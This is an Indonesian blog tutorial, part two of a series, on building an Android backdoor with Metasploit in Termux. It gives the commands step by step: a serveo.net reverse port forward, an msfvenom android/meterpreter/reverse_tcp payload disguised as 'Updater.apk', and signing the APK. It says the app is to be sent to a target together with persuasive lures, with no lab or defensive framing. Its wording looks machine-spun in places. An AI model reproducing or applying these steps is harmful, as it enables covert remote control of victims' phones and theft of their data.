Lompat ke konten Lompat ke sidebar Lompat ke footer

Membuat Payload Metasploit Di Android || Part 2


Metasploit || Part 2

[Part 2]

Pada langkah kali ini kita akan berguru menciptakan payload atau backdoor memakai metasploit framework, kemudian kita akan berguru menggabungkan payload dengan sebuah aplikasi android yang nantinya kita kirimkan ke sasaran beserta kata-kata rayuan manis.

Oh ya, bagi kalian yang belum memasang metasploit pada perangkat kalian, silahkan cek tutorial Part 1 disini: Cara Install Metasploit Framework di Android


Bahan-bahan yang diperlukan:
Jika ada link yang mati/error, silahkan laporkan ke ig: ridho.zinta


Langkah-langkah:
[Bagian 1: Port Forwarding]
  1. Nyalakan terminal Termux, teman dapat mendownloadnya di google playstore
  2. Pastikan Metasploit Framework telah terpasang pada Termux sobat, Kalian dapat mengikuti tutorial disini 
  3. Pada termux kita pasang pula openssh untuk nantinya kita melaksanakan port forwarding, ketik perintah dibawah ini pada terminal termux
pkg install openssh
    4. Sekarang saatnya kita melaksanakan port forwarding, disini saya menentukan memakai server dari web serveo.net alasannya yaitu bersifat persistant dan lebih gampang untuk melaksanakan reverse tcp. Untuk menjalankannya ketik perintah dibawah ini pada termux:


ssh -R [port]:localhost:[port] serveo.net

nb: ganti [port] dengan port yang ingin dibuka, misal 4564
sehingga menjadi: ssh -R 4564:localhost:4564 serveo.net

Jika berhasil, maka akan terlihat menyerupai gambar dibawah ini:



[Bagian 2: Membuat file APK serta payloadnya]
  • Tarik bilah kiri pada termux, kemudian buka session baru, ingat session untuk port forwarding diatas jangan ditutup ya, biar servicenya tetap berjalan
  •  Saatnya menciptakan backdoor berupa file APK, ketik perintah dibawah ini pada session gres tersebut:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
> storage/downloads/Updater.apk


  • Tunggu sebentar, bila berhasil maka akan menyerupai gambar dibawah ini:
  • Oke kini file APK telah ada di memori internal sobat, tepatnya di folder download, eiits tapi inget, filenya masih mentah, blom dapat diinstall, perlu kita Signin dlu supaya dapat dipasang di semua android.
Nb: untuk merubah nama apknya , teman dapat memakai APK editor pro untuk merubah nama defaultnya (Main Activity) ataupun versi filenya.


[Bagian 3: Men-signing File Apk]

  1. Buka MiXplorer File manager yang sebelumnya sudah diinstall
  2. Arahkan ke kawasan file apk yang tadi gres dibuat
  3. Tekan usang pada file apknya, kemudian pilih sign dan pilih auto menyerupai pada gambar dibawah ini

  4. Jika sudah maka akan muncul file gres dengan nama Updater-signed.apk menyerupai gambar berikut.
  5. Sampai sini teman sudah berhasil menciptakan sebuah jadwal dengan payload didalamnya

Pada Part selanjutnya kita akan membahas cara memanggil payloadnya serta perintah-perintah seru yang dapat kita lakukan dengan metasploit






Sumber https://evocyberteam.blogspot.com/